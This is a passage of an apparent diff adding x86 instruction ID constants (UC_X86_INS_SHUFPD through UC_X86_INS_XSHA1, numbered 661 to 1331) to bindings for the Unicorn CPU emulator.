UC_X86_INS_SHUFPD = 661; + UC_X86_INS_SHUFPS = 662; + UC_X86_INS_SIDT = 663; + UC_X86_INS_FSIN = 
664; + UC_X86_INS_SKINIT = 665; + UC_X86_INS_SLDT = 666; + UC_X86_INS_SMSW = 667; + UC_X86_INS_SQRTPD = 668; + UC_X86_INS_SQRTPS = 669; + UC_X86_INS_SQRTSD = 670; + UC_X86_INS_SQRTSS = 671; + UC_X86_INS_FSQRT = 672; + UC_X86_INS_STAC = 673; + UC_X86_INS_STC = 674; + UC_X86_INS_STD = 675; + UC_X86_INS_STGI = 676; + UC_X86_INS_STI = 677; + UC_X86_INS_STMXCSR = 678; + UC_X86_INS_STOSB = 679; + UC_X86_INS_STOSD = 680; + UC_X86_INS_STOSQ = 681; + UC_X86_INS_STOSW = 682; + UC_X86_INS_STR = 683; + UC_X86_INS_FST = 684; + UC_X86_INS_FSTP = 685; + UC_X86_INS_FSTPNCE = 686; + UC_X86_INS_FXCH = 687; + UC_X86_INS_SUBPD = 688; + UC_X86_INS_SUBPS = 689; + UC_X86_INS_FSUBR = 690; + UC_X86_INS_FISUBR = 691; + UC_X86_INS_FSUBRP = 692; + UC_X86_INS_SUBSD = 693; + UC_X86_INS_SUBSS = 694; + UC_X86_INS_FSUB = 695; + UC_X86_INS_FISUB = 696; + UC_X86_INS_FSUBP = 697; + UC_X86_INS_SWAPGS = 698; + UC_X86_INS_SYSCALL = 699; + UC_X86_INS_SYSENTER = 700; + UC_X86_INS_SYSEXIT = 701; + UC_X86_INS_SYSRET = 702; + UC_X86_INS_T1MSKC = 703; + UC_X86_INS_TEST = 704; + UC_X86_INS_UD2 = 705; + UC_X86_INS_FTST = 706; + UC_X86_INS_TZCNT = 707; + UC_X86_INS_TZMSK = 708; + UC_X86_INS_FUCOMPI = 709; + UC_X86_INS_FUCOMI = 710; + UC_X86_INS_FUCOMPP = 711; + UC_X86_INS_FUCOMP = 712; + UC_X86_INS_FUCOM = 713; + UC_X86_INS_UD2B = 714; + UC_X86_INS_UNPCKHPD = 715; + UC_X86_INS_UNPCKHPS = 716; + UC_X86_INS_UNPCKLPD = 717; + UC_X86_INS_UNPCKLPS = 718; + UC_X86_INS_VADDPD = 719; + UC_X86_INS_VADDPS = 720; + UC_X86_INS_VADDSD = 721; + UC_X86_INS_VADDSS = 722; + UC_X86_INS_VADDSUBPD = 723; + UC_X86_INS_VADDSUBPS = 724; + UC_X86_INS_VAESDECLAST = 725; + UC_X86_INS_VAESDEC = 726; + UC_X86_INS_VAESENCLAST = 727; + UC_X86_INS_VAESENC = 728; + UC_X86_INS_VAESIMC = 729; + UC_X86_INS_VAESKEYGENASSIST = 730; + UC_X86_INS_VALIGND = 731; + UC_X86_INS_VALIGNQ = 732; + UC_X86_INS_VANDNPD = 733; + UC_X86_INS_VANDNPS = 734; + UC_X86_INS_VANDPD = 735; + UC_X86_INS_VANDPS = 736; + UC_X86_INS_VBLENDMPD = 737; + UC_X86_INS_VBLENDMPS = 
738; + UC_X86_INS_VBLENDPD = 739; + UC_X86_INS_VBLENDPS = 740; + UC_X86_INS_VBLENDVPD = 741; + UC_X86_INS_VBLENDVPS = 742; + UC_X86_INS_VBROADCASTF128 = 743; + UC_X86_INS_VBROADCASTI32X4 = 744; + UC_X86_INS_VBROADCASTI64X4 = 745; + UC_X86_INS_VBROADCASTSD = 746; + UC_X86_INS_VBROADCASTSS = 747; + UC_X86_INS_VCMPPD = 748; + UC_X86_INS_VCMPPS = 749; + UC_X86_INS_VCMPSD = 750; + UC_X86_INS_VCMPSS = 751; + UC_X86_INS_VCOMPRESSPD = 752; + UC_X86_INS_VCOMPRESSPS = 753; + UC_X86_INS_VCVTDQ2PD = 754; + UC_X86_INS_VCVTDQ2PS = 755; + UC_X86_INS_VCVTPD2DQX = 756; + UC_X86_INS_VCVTPD2DQ = 757; + UC_X86_INS_VCVTPD2PSX = 758; + UC_X86_INS_VCVTPD2PS = 759; + UC_X86_INS_VCVTPD2UDQ = 760; + UC_X86_INS_VCVTPH2PS = 761; + UC_X86_INS_VCVTPS2DQ = 762; + UC_X86_INS_VCVTPS2PD = 763; + UC_X86_INS_VCVTPS2PH = 764; + UC_X86_INS_VCVTPS2UDQ = 765; + UC_X86_INS_VCVTSD2SI = 766; + UC_X86_INS_VCVTSD2USI = 767; + UC_X86_INS_VCVTSS2SI = 768; + UC_X86_INS_VCVTSS2USI = 769; + UC_X86_INS_VCVTTPD2DQX = 770; + UC_X86_INS_VCVTTPD2DQ = 771; + UC_X86_INS_VCVTTPD2UDQ = 772; + UC_X86_INS_VCVTTPS2DQ = 773; + UC_X86_INS_VCVTTPS2UDQ = 774; + UC_X86_INS_VCVTUDQ2PD = 775; + UC_X86_INS_VCVTUDQ2PS = 776; + UC_X86_INS_VDIVPD = 777; + UC_X86_INS_VDIVPS = 778; + UC_X86_INS_VDIVSD = 779; + UC_X86_INS_VDIVSS = 780; + UC_X86_INS_VDPPD = 781; + UC_X86_INS_VDPPS = 782; + UC_X86_INS_VERR = 783; + UC_X86_INS_VERW = 784; + UC_X86_INS_VEXP2PD = 785; + UC_X86_INS_VEXP2PS = 786; + UC_X86_INS_VEXPANDPD = 787; + UC_X86_INS_VEXPANDPS = 788; + UC_X86_INS_VEXTRACTF128 = 789; + UC_X86_INS_VEXTRACTF32X4 = 790; + UC_X86_INS_VEXTRACTF64X4 = 791; + UC_X86_INS_VEXTRACTI128 = 792; + UC_X86_INS_VEXTRACTI32X4 = 793; + UC_X86_INS_VEXTRACTI64X4 = 794; + UC_X86_INS_VEXTRACTPS = 795; + UC_X86_INS_VFMADD132PD = 796; + UC_X86_INS_VFMADD132PS = 797; + UC_X86_INS_VFMADDPD = 798; + UC_X86_INS_VFMADD213PD = 799; + UC_X86_INS_VFMADD231PD = 800; + UC_X86_INS_VFMADDPS = 801; + UC_X86_INS_VFMADD213PS = 802; + UC_X86_INS_VFMADD231PS = 803; + 
UC_X86_INS_VFMADDSD = 804; + UC_X86_INS_VFMADD213SD = 805; + UC_X86_INS_VFMADD132SD = 806; + UC_X86_INS_VFMADD231SD = 807; + UC_X86_INS_VFMADDSS = 808; + UC_X86_INS_VFMADD213SS = 809; + UC_X86_INS_VFMADD132SS = 810; + UC_X86_INS_VFMADD231SS = 811; + UC_X86_INS_VFMADDSUB132PD = 812; + UC_X86_INS_VFMADDSUB132PS = 813; + UC_X86_INS_VFMADDSUBPD = 814; + UC_X86_INS_VFMADDSUB213PD = 815; + UC_X86_INS_VFMADDSUB231PD = 816; + UC_X86_INS_VFMADDSUBPS = 817; + UC_X86_INS_VFMADDSUB213PS = 818; + UC_X86_INS_VFMADDSUB231PS = 819; + UC_X86_INS_VFMSUB132PD = 820; + UC_X86_INS_VFMSUB132PS = 821; + UC_X86_INS_VFMSUBADD132PD = 822; + UC_X86_INS_VFMSUBADD132PS = 823; + UC_X86_INS_VFMSUBADDPD = 824; + UC_X86_INS_VFMSUBADD213PD = 825; + UC_X86_INS_VFMSUBADD231PD = 826; + UC_X86_INS_VFMSUBADDPS = 827; + UC_X86_INS_VFMSUBADD213PS = 828; + UC_X86_INS_VFMSUBADD231PS = 829; + UC_X86_INS_VFMSUBPD = 830; + UC_X86_INS_VFMSUB213PD = 831; + UC_X86_INS_VFMSUB231PD = 832; + UC_X86_INS_VFMSUBPS = 833; + UC_X86_INS_VFMSUB213PS = 834; + UC_X86_INS_VFMSUB231PS = 835; + UC_X86_INS_VFMSUBSD = 836; + UC_X86_INS_VFMSUB213SD = 837; + UC_X86_INS_VFMSUB132SD = 838; + UC_X86_INS_VFMSUB231SD = 839; + UC_X86_INS_VFMSUBSS = 840; + UC_X86_INS_VFMSUB213SS = 841; + UC_X86_INS_VFMSUB132SS = 842; + UC_X86_INS_VFMSUB231SS = 843; + UC_X86_INS_VFNMADD132PD = 844; + UC_X86_INS_VFNMADD132PS = 845; + UC_X86_INS_VFNMADDPD = 846; + UC_X86_INS_VFNMADD213PD = 847; + UC_X86_INS_VFNMADD231PD = 848; + UC_X86_INS_VFNMADDPS = 849; + UC_X86_INS_VFNMADD213PS = 850; + UC_X86_INS_VFNMADD231PS = 851; + UC_X86_INS_VFNMADDSD = 852; + UC_X86_INS_VFNMADD213SD = 853; + UC_X86_INS_VFNMADD132SD = 854; + UC_X86_INS_VFNMADD231SD = 855; + UC_X86_INS_VFNMADDSS = 856; + UC_X86_INS_VFNMADD213SS = 857; + UC_X86_INS_VFNMADD132SS = 858; + UC_X86_INS_VFNMADD231SS = 859; + UC_X86_INS_VFNMSUB132PD = 860; + UC_X86_INS_VFNMSUB132PS = 861; + UC_X86_INS_VFNMSUBPD = 862; + UC_X86_INS_VFNMSUB213PD = 863; + UC_X86_INS_VFNMSUB231PD = 864; + UC_X86_INS_VFNMSUBPS = 
865; + UC_X86_INS_VFNMSUB213PS = 866; + UC_X86_INS_VFNMSUB231PS = 867; + UC_X86_INS_VFNMSUBSD = 868; + UC_X86_INS_VFNMSUB213SD = 869; + UC_X86_INS_VFNMSUB132SD = 870; + UC_X86_INS_VFNMSUB231SD = 871; + UC_X86_INS_VFNMSUBSS = 872; + UC_X86_INS_VFNMSUB213SS = 873; + UC_X86_INS_VFNMSUB132SS = 874; + UC_X86_INS_VFNMSUB231SS = 875; + UC_X86_INS_VFRCZPD = 876; + UC_X86_INS_VFRCZPS = 877; + UC_X86_INS_VFRCZSD = 878; + UC_X86_INS_VFRCZSS = 879; + UC_X86_INS_VORPD = 880; + UC_X86_INS_VORPS = 881; + UC_X86_INS_VXORPD = 882; + UC_X86_INS_VXORPS = 883; + UC_X86_INS_VGATHERDPD = 884; + UC_X86_INS_VGATHERDPS = 885; + UC_X86_INS_VGATHERPF0DPD = 886; + UC_X86_INS_VGATHERPF0DPS = 887; + UC_X86_INS_VGATHERPF0QPD = 888; + UC_X86_INS_VGATHERPF0QPS = 889; + UC_X86_INS_VGATHERPF1DPD = 890; + UC_X86_INS_VGATHERPF1DPS = 891; + UC_X86_INS_VGATHERPF1QPD = 892; + UC_X86_INS_VGATHERPF1QPS = 893; + UC_X86_INS_VGATHERQPD = 894; + UC_X86_INS_VGATHERQPS = 895; + UC_X86_INS_VHADDPD = 896; + UC_X86_INS_VHADDPS = 897; + UC_X86_INS_VHSUBPD = 898; + UC_X86_INS_VHSUBPS = 899; + UC_X86_INS_VINSERTF128 = 900; + UC_X86_INS_VINSERTF32X4 = 901; + UC_X86_INS_VINSERTF32X8 = 902; + UC_X86_INS_VINSERTF64X2 = 903; + UC_X86_INS_VINSERTF64X4 = 904; + UC_X86_INS_VINSERTI128 = 905; + UC_X86_INS_VINSERTI32X4 = 906; + UC_X86_INS_VINSERTI32X8 = 907; + UC_X86_INS_VINSERTI64X2 = 908; + UC_X86_INS_VINSERTI64X4 = 909; + UC_X86_INS_VINSERTPS = 910; + UC_X86_INS_VLDDQU = 911; + UC_X86_INS_VLDMXCSR = 912; + UC_X86_INS_VMASKMOVDQU = 913; + UC_X86_INS_VMASKMOVPD = 914; + UC_X86_INS_VMASKMOVPS = 915; + UC_X86_INS_VMAXPD = 916; + UC_X86_INS_VMAXPS = 917; + UC_X86_INS_VMAXSD = 918; + UC_X86_INS_VMAXSS = 919; + UC_X86_INS_VMCALL = 920; + UC_X86_INS_VMCLEAR = 921; + UC_X86_INS_VMFUNC = 922; + UC_X86_INS_VMINPD = 923; + UC_X86_INS_VMINPS = 924; + UC_X86_INS_VMINSD = 925; + UC_X86_INS_VMINSS = 926; + UC_X86_INS_VMLAUNCH = 927; + UC_X86_INS_VMLOAD = 928; + UC_X86_INS_VMMCALL = 929; + UC_X86_INS_VMOVQ = 930; + UC_X86_INS_VMOVDDUP = 931; 
+ UC_X86_INS_VMOVD = 932; + UC_X86_INS_VMOVDQA32 = 933; + UC_X86_INS_VMOVDQA64 = 934; + UC_X86_INS_VMOVDQA = 935; + UC_X86_INS_VMOVDQU16 = 936; + UC_X86_INS_VMOVDQU32 = 937; + UC_X86_INS_VMOVDQU64 = 938; + UC_X86_INS_VMOVDQU8 = 939; + UC_X86_INS_VMOVDQU = 940; + UC_X86_INS_VMOVHLPS = 941; + UC_X86_INS_VMOVHPD = 942; + UC_X86_INS_VMOVHPS = 943; + UC_X86_INS_VMOVLHPS = 944; + UC_X86_INS_VMOVLPD = 945; + UC_X86_INS_VMOVLPS = 946; + UC_X86_INS_VMOVMSKPD = 947; + UC_X86_INS_VMOVMSKPS = 948; + UC_X86_INS_VMOVNTDQA = 949; + UC_X86_INS_VMOVNTDQ = 950; + UC_X86_INS_VMOVNTPD = 951; + UC_X86_INS_VMOVNTPS = 952; + UC_X86_INS_VMOVSD = 953; + UC_X86_INS_VMOVSHDUP = 954; + UC_X86_INS_VMOVSLDUP = 955; + UC_X86_INS_VMOVSS = 956; + UC_X86_INS_VMOVUPD = 957; + UC_X86_INS_VMOVUPS = 958; + UC_X86_INS_VMPSADBW = 959; + UC_X86_INS_VMPTRLD = 960; + UC_X86_INS_VMPTRST = 961; + UC_X86_INS_VMREAD = 962; + UC_X86_INS_VMRESUME = 963; + UC_X86_INS_VMRUN = 964; + UC_X86_INS_VMSAVE = 965; + UC_X86_INS_VMULPD = 966; + UC_X86_INS_VMULPS = 967; + UC_X86_INS_VMULSD = 968; + UC_X86_INS_VMULSS = 969; + UC_X86_INS_VMWRITE = 970; + UC_X86_INS_VMXOFF = 971; + UC_X86_INS_VMXON = 972; + UC_X86_INS_VPABSB = 973; + UC_X86_INS_VPABSD = 974; + UC_X86_INS_VPABSQ = 975; + UC_X86_INS_VPABSW = 976; + UC_X86_INS_VPACKSSDW = 977; + UC_X86_INS_VPACKSSWB = 978; + UC_X86_INS_VPACKUSDW = 979; + UC_X86_INS_VPACKUSWB = 980; + UC_X86_INS_VPADDB = 981; + UC_X86_INS_VPADDD = 982; + UC_X86_INS_VPADDQ = 983; + UC_X86_INS_VPADDSB = 984; + UC_X86_INS_VPADDSW = 985; + UC_X86_INS_VPADDUSB = 986; + UC_X86_INS_VPADDUSW = 987; + UC_X86_INS_VPADDW = 988; + UC_X86_INS_VPALIGNR = 989; + UC_X86_INS_VPANDD = 990; + UC_X86_INS_VPANDND = 991; + UC_X86_INS_VPANDNQ = 992; + UC_X86_INS_VPANDN = 993; + UC_X86_INS_VPANDQ = 994; + UC_X86_INS_VPAND = 995; + UC_X86_INS_VPAVGB = 996; + UC_X86_INS_VPAVGW = 997; + UC_X86_INS_VPBLENDD = 998; + UC_X86_INS_VPBLENDMB = 999; + UC_X86_INS_VPBLENDMD = 1000; + UC_X86_INS_VPBLENDMQ = 1001; + 
UC_X86_INS_VPBLENDMW = 1002; + UC_X86_INS_VPBLENDVB = 1003; + UC_X86_INS_VPBLENDW = 1004; + UC_X86_INS_VPBROADCASTB = 1005; + UC_X86_INS_VPBROADCASTD = 1006; + UC_X86_INS_VPBROADCASTMB2Q = 1007; + UC_X86_INS_VPBROADCASTMW2D = 1008; + UC_X86_INS_VPBROADCASTQ = 1009; + UC_X86_INS_VPBROADCASTW = 1010; + UC_X86_INS_VPCLMULQDQ = 1011; + UC_X86_INS_VPCMOV = 1012; + UC_X86_INS_VPCMPB = 1013; + UC_X86_INS_VPCMPD = 1014; + UC_X86_INS_VPCMPEQB = 1015; + UC_X86_INS_VPCMPEQD = 1016; + UC_X86_INS_VPCMPEQQ = 1017; + UC_X86_INS_VPCMPEQW = 1018; + UC_X86_INS_VPCMPESTRI = 1019; + UC_X86_INS_VPCMPESTRM = 1020; + UC_X86_INS_VPCMPGTB = 1021; + UC_X86_INS_VPCMPGTD = 1022; + UC_X86_INS_VPCMPGTQ = 1023; + UC_X86_INS_VPCMPGTW = 1024; + UC_X86_INS_VPCMPISTRI = 1025; + UC_X86_INS_VPCMPISTRM = 1026; + UC_X86_INS_VPCMPQ = 1027; + UC_X86_INS_VPCMPUB = 1028; + UC_X86_INS_VPCMPUD = 1029; + UC_X86_INS_VPCMPUQ = 1030; + UC_X86_INS_VPCMPUW = 1031; + UC_X86_INS_VPCMPW = 1032; + UC_X86_INS_VPCOMB = 1033; + UC_X86_INS_VPCOMD = 1034; + UC_X86_INS_VPCOMPRESSD = 1035; + UC_X86_INS_VPCOMPRESSQ = 1036; + UC_X86_INS_VPCOMQ = 1037; + UC_X86_INS_VPCOMUB = 1038; + UC_X86_INS_VPCOMUD = 1039; + UC_X86_INS_VPCOMUQ = 1040; + UC_X86_INS_VPCOMUW = 1041; + UC_X86_INS_VPCOMW = 1042; + UC_X86_INS_VPCONFLICTD = 1043; + UC_X86_INS_VPCONFLICTQ = 1044; + UC_X86_INS_VPERM2F128 = 1045; + UC_X86_INS_VPERM2I128 = 1046; + UC_X86_INS_VPERMD = 1047; + UC_X86_INS_VPERMI2D = 1048; + UC_X86_INS_VPERMI2PD = 1049; + UC_X86_INS_VPERMI2PS = 1050; + UC_X86_INS_VPERMI2Q = 1051; + UC_X86_INS_VPERMIL2PD = 1052; + UC_X86_INS_VPERMIL2PS = 1053; + UC_X86_INS_VPERMILPD = 1054; + UC_X86_INS_VPERMILPS = 1055; + UC_X86_INS_VPERMPD = 1056; + UC_X86_INS_VPERMPS = 1057; + UC_X86_INS_VPERMQ = 1058; + UC_X86_INS_VPERMT2D = 1059; + UC_X86_INS_VPERMT2PD = 1060; + UC_X86_INS_VPERMT2PS = 1061; + UC_X86_INS_VPERMT2Q = 1062; + UC_X86_INS_VPEXPANDD = 1063; + UC_X86_INS_VPEXPANDQ = 1064; + UC_X86_INS_VPEXTRB = 1065; + UC_X86_INS_VPEXTRD = 1066; + 
UC_X86_INS_VPEXTRQ = 1067; + UC_X86_INS_VPEXTRW = 1068; + UC_X86_INS_VPGATHERDD = 1069; + UC_X86_INS_VPGATHERDQ = 1070; + UC_X86_INS_VPGATHERQD = 1071; + UC_X86_INS_VPGATHERQQ = 1072; + UC_X86_INS_VPHADDBD = 1073; + UC_X86_INS_VPHADDBQ = 1074; + UC_X86_INS_VPHADDBW = 1075; + UC_X86_INS_VPHADDDQ = 1076; + UC_X86_INS_VPHADDD = 1077; + UC_X86_INS_VPHADDSW = 1078; + UC_X86_INS_VPHADDUBD = 1079; + UC_X86_INS_VPHADDUBQ = 1080; + UC_X86_INS_VPHADDUBW = 1081; + UC_X86_INS_VPHADDUDQ = 1082; + UC_X86_INS_VPHADDUWD = 1083; + UC_X86_INS_VPHADDUWQ = 1084; + UC_X86_INS_VPHADDWD = 1085; + UC_X86_INS_VPHADDWQ = 1086; + UC_X86_INS_VPHADDW = 1087; + UC_X86_INS_VPHMINPOSUW = 1088; + UC_X86_INS_VPHSUBBW = 1089; + UC_X86_INS_VPHSUBDQ = 1090; + UC_X86_INS_VPHSUBD = 1091; + UC_X86_INS_VPHSUBSW = 1092; + UC_X86_INS_VPHSUBWD = 1093; + UC_X86_INS_VPHSUBW = 1094; + UC_X86_INS_VPINSRB = 1095; + UC_X86_INS_VPINSRD = 1096; + UC_X86_INS_VPINSRQ = 1097; + UC_X86_INS_VPINSRW = 1098; + UC_X86_INS_VPLZCNTD = 1099; + UC_X86_INS_VPLZCNTQ = 1100; + UC_X86_INS_VPMACSDD = 1101; + UC_X86_INS_VPMACSDQH = 1102; + UC_X86_INS_VPMACSDQL = 1103; + UC_X86_INS_VPMACSSDD = 1104; + UC_X86_INS_VPMACSSDQH = 1105; + UC_X86_INS_VPMACSSDQL = 1106; + UC_X86_INS_VPMACSSWD = 1107; + UC_X86_INS_VPMACSSWW = 1108; + UC_X86_INS_VPMACSWD = 1109; + UC_X86_INS_VPMACSWW = 1110; + UC_X86_INS_VPMADCSSWD = 1111; + UC_X86_INS_VPMADCSWD = 1112; + UC_X86_INS_VPMADDUBSW = 1113; + UC_X86_INS_VPMADDWD = 1114; + UC_X86_INS_VPMASKMOVD = 1115; + UC_X86_INS_VPMASKMOVQ = 1116; + UC_X86_INS_VPMAXSB = 1117; + UC_X86_INS_VPMAXSD = 1118; + UC_X86_INS_VPMAXSQ = 1119; + UC_X86_INS_VPMAXSW = 1120; + UC_X86_INS_VPMAXUB = 1121; + UC_X86_INS_VPMAXUD = 1122; + UC_X86_INS_VPMAXUQ = 1123; + UC_X86_INS_VPMAXUW = 1124; + UC_X86_INS_VPMINSB = 1125; + UC_X86_INS_VPMINSD = 1126; + UC_X86_INS_VPMINSQ = 1127; + UC_X86_INS_VPMINSW = 1128; + UC_X86_INS_VPMINUB = 1129; + UC_X86_INS_VPMINUD = 1130; + UC_X86_INS_VPMINUQ = 1131; + UC_X86_INS_VPMINUW = 1132; + 
UC_X86_INS_VPMOVDB = 1133; + UC_X86_INS_VPMOVDW = 1134; + UC_X86_INS_VPMOVM2B = 1135; + UC_X86_INS_VPMOVM2D = 1136; + UC_X86_INS_VPMOVM2Q = 1137; + UC_X86_INS_VPMOVM2W = 1138; + UC_X86_INS_VPMOVMSKB = 1139; + UC_X86_INS_VPMOVQB = 1140; + UC_X86_INS_VPMOVQD = 1141; + UC_X86_INS_VPMOVQW = 1142; + UC_X86_INS_VPMOVSDB = 1143; + UC_X86_INS_VPMOVSDW = 1144; + UC_X86_INS_VPMOVSQB = 1145; + UC_X86_INS_VPMOVSQD = 1146; + UC_X86_INS_VPMOVSQW = 1147; + UC_X86_INS_VPMOVSXBD = 1148; + UC_X86_INS_VPMOVSXBQ = 1149; + UC_X86_INS_VPMOVSXBW = 1150; + UC_X86_INS_VPMOVSXDQ = 1151; + UC_X86_INS_VPMOVSXWD = 1152; + UC_X86_INS_VPMOVSXWQ = 1153; + UC_X86_INS_VPMOVUSDB = 1154; + UC_X86_INS_VPMOVUSDW = 1155; + UC_X86_INS_VPMOVUSQB = 1156; + UC_X86_INS_VPMOVUSQD = 1157; + UC_X86_INS_VPMOVUSQW = 1158; + UC_X86_INS_VPMOVZXBD = 1159; + UC_X86_INS_VPMOVZXBQ = 1160; + UC_X86_INS_VPMOVZXBW = 1161; + UC_X86_INS_VPMOVZXDQ = 1162; + UC_X86_INS_VPMOVZXWD = 1163; + UC_X86_INS_VPMOVZXWQ = 1164; + UC_X86_INS_VPMULDQ = 1165; + UC_X86_INS_VPMULHRSW = 1166; + UC_X86_INS_VPMULHUW = 1167; + UC_X86_INS_VPMULHW = 1168; + UC_X86_INS_VPMULLD = 1169; + UC_X86_INS_VPMULLQ = 1170; + UC_X86_INS_VPMULLW = 1171; + UC_X86_INS_VPMULUDQ = 1172; + UC_X86_INS_VPORD = 1173; + UC_X86_INS_VPORQ = 1174; + UC_X86_INS_VPOR = 1175; + UC_X86_INS_VPPERM = 1176; + UC_X86_INS_VPROTB = 1177; + UC_X86_INS_VPROTD = 1178; + UC_X86_INS_VPROTQ = 1179; + UC_X86_INS_VPROTW = 1180; + UC_X86_INS_VPSADBW = 1181; + UC_X86_INS_VPSCATTERDD = 1182; + UC_X86_INS_VPSCATTERDQ = 1183; + UC_X86_INS_VPSCATTERQD = 1184; + UC_X86_INS_VPSCATTERQQ = 1185; + UC_X86_INS_VPSHAB = 1186; + UC_X86_INS_VPSHAD = 1187; + UC_X86_INS_VPSHAQ = 1188; + UC_X86_INS_VPSHAW = 1189; + UC_X86_INS_VPSHLB = 1190; + UC_X86_INS_VPSHLD = 1191; + UC_X86_INS_VPSHLQ = 1192; + UC_X86_INS_VPSHLW = 1193; + UC_X86_INS_VPSHUFB = 1194; + UC_X86_INS_VPSHUFD = 1195; + UC_X86_INS_VPSHUFHW = 1196; + UC_X86_INS_VPSHUFLW = 1197; + UC_X86_INS_VPSIGNB = 1198; + UC_X86_INS_VPSIGND = 1199; + 
UC_X86_INS_VPSIGNW = 1200; + UC_X86_INS_VPSLLDQ = 1201; + UC_X86_INS_VPSLLD = 1202; + UC_X86_INS_VPSLLQ = 1203; + UC_X86_INS_VPSLLVD = 1204; + UC_X86_INS_VPSLLVQ = 1205; + UC_X86_INS_VPSLLW = 1206; + UC_X86_INS_VPSRAD = 1207; + UC_X86_INS_VPSRAQ = 1208; + UC_X86_INS_VPSRAVD = 1209; + UC_X86_INS_VPSRAVQ = 1210; + UC_X86_INS_VPSRAW = 1211; + UC_X86_INS_VPSRLDQ = 1212; + UC_X86_INS_VPSRLD = 1213; + UC_X86_INS_VPSRLQ = 1214; + UC_X86_INS_VPSRLVD = 1215; + UC_X86_INS_VPSRLVQ = 1216; + UC_X86_INS_VPSRLW = 1217; + UC_X86_INS_VPSUBB = 1218; + UC_X86_INS_VPSUBD = 1219; + UC_X86_INS_VPSUBQ = 1220; + UC_X86_INS_VPSUBSB = 1221; + UC_X86_INS_VPSUBSW = 1222; + UC_X86_INS_VPSUBUSB = 1223; + UC_X86_INS_VPSUBUSW = 1224; + UC_X86_INS_VPSUBW = 1225; + UC_X86_INS_VPTESTMD = 1226; + UC_X86_INS_VPTESTMQ = 1227; + UC_X86_INS_VPTESTNMD = 1228; + UC_X86_INS_VPTESTNMQ = 1229; + UC_X86_INS_VPTEST = 1230; + UC_X86_INS_VPUNPCKHBW = 1231; + UC_X86_INS_VPUNPCKHDQ = 1232; + UC_X86_INS_VPUNPCKHQDQ = 1233; + UC_X86_INS_VPUNPCKHWD = 1234; + UC_X86_INS_VPUNPCKLBW = 1235; + UC_X86_INS_VPUNPCKLDQ = 1236; + UC_X86_INS_VPUNPCKLQDQ = 1237; + UC_X86_INS_VPUNPCKLWD = 1238; + UC_X86_INS_VPXORD = 1239; + UC_X86_INS_VPXORQ = 1240; + UC_X86_INS_VPXOR = 1241; + UC_X86_INS_VRCP14PD = 1242; + UC_X86_INS_VRCP14PS = 1243; + UC_X86_INS_VRCP14SD = 1244; + UC_X86_INS_VRCP14SS = 1245; + UC_X86_INS_VRCP28PD = 1246; + UC_X86_INS_VRCP28PS = 1247; + UC_X86_INS_VRCP28SD = 1248; + UC_X86_INS_VRCP28SS = 1249; + UC_X86_INS_VRCPPS = 1250; + UC_X86_INS_VRCPSS = 1251; + UC_X86_INS_VRNDSCALEPD = 1252; + UC_X86_INS_VRNDSCALEPS = 1253; + UC_X86_INS_VRNDSCALESD = 1254; + UC_X86_INS_VRNDSCALESS = 1255; + UC_X86_INS_VROUNDPD = 1256; + UC_X86_INS_VROUNDPS = 1257; + UC_X86_INS_VROUNDSD = 1258; + UC_X86_INS_VROUNDSS = 1259; + UC_X86_INS_VRSQRT14PD = 1260; + UC_X86_INS_VRSQRT14PS = 1261; + UC_X86_INS_VRSQRT14SD = 1262; + UC_X86_INS_VRSQRT14SS = 1263; + UC_X86_INS_VRSQRT28PD = 1264; + UC_X86_INS_VRSQRT28PS = 1265; + UC_X86_INS_VRSQRT28SD = 
1266; + UC_X86_INS_VRSQRT28SS = 1267; + UC_X86_INS_VRSQRTPS = 1268; + UC_X86_INS_VRSQRTSS = 1269; + UC_X86_INS_VSCATTERDPD = 1270; + UC_X86_INS_VSCATTERDPS = 1271; + UC_X86_INS_VSCATTERPF0DPD = 1272; + UC_X86_INS_VSCATTERPF0DPS = 1273; + UC_X86_INS_VSCATTERPF0QPD = 1274; + UC_X86_INS_VSCATTERPF0QPS = 1275; + UC_X86_INS_VSCATTERPF1DPD = 1276; + UC_X86_INS_VSCATTERPF1DPS = 1277; + UC_X86_INS_VSCATTERPF1QPD = 1278; + UC_X86_INS_VSCATTERPF1QPS = 1279; + UC_X86_INS_VSCATTERQPD = 1280; + UC_X86_INS_VSCATTERQPS = 1281; + UC_X86_INS_VSHUFPD = 1282; + UC_X86_INS_VSHUFPS = 1283; + UC_X86_INS_VSQRTPD = 1284; + UC_X86_INS_VSQRTPS = 1285; + UC_X86_INS_VSQRTSD = 1286; + UC_X86_INS_VSQRTSS = 1287; + UC_X86_INS_VSTMXCSR = 1288; + UC_X86_INS_VSUBPD = 1289; + UC_X86_INS_VSUBPS = 1290; + UC_X86_INS_VSUBSD = 1291; + UC_X86_INS_VSUBSS = 1292; + UC_X86_INS_VTESTPD = 1293; + UC_X86_INS_VTESTPS = 1294; + UC_X86_INS_VUNPCKHPD = 1295; + UC_X86_INS_VUNPCKHPS = 1296; + UC_X86_INS_VUNPCKLPD = 1297; + UC_X86_INS_VUNPCKLPS = 1298; + UC_X86_INS_VZEROALL = 1299; + UC_X86_INS_VZEROUPPER = 1300; + UC_X86_INS_WAIT = 1301; + UC_X86_INS_WBINVD = 1302; + UC_X86_INS_WRFSBASE = 1303; + UC_X86_INS_WRGSBASE = 1304; + UC_X86_INS_WRMSR = 1305; + UC_X86_INS_XABORT = 1306; + UC_X86_INS_XACQUIRE = 1307; + UC_X86_INS_XBEGIN = 1308; + UC_X86_INS_XCHG = 1309; + UC_X86_INS_XCRYPTCBC = 1310; + UC_X86_INS_XCRYPTCFB = 1311; + UC_X86_INS_XCRYPTCTR = 1312; + UC_X86_INS_XCRYPTECB = 1313; + UC_X86_INS_XCRYPTOFB = 1314; + UC_X86_INS_XEND = 1315; + UC_X86_INS_XGETBV = 1316; + UC_X86_INS_XLATB = 1317; + UC_X86_INS_XRELEASE = 1318; + UC_X86_INS_XRSTOR = 1319; + UC_X86_INS_XRSTOR64 = 1320; + UC_X86_INS_XRSTORS = 1321; + UC_X86_INS_XRSTORS64 = 1322; + UC_X86_INS_XSAVE = 1323; + UC_X86_INS_XSAVE64 = 1324; + UC_X86_INS_XSAVEC = 1325; + UC_X86_INS_XSAVEC64 = 1326; + UC_X86_INS_XSAVEOPT = 1327; + UC_X86_INS_XSAVEOPT64 = 1328; + UC_X86_INS_XSAVES = 1329; + UC_X86_INS_XSAVES64 = 1330; + UC_X86_INS_XSETBV = 1331; + UC_X86_INS_XSHA1 = 
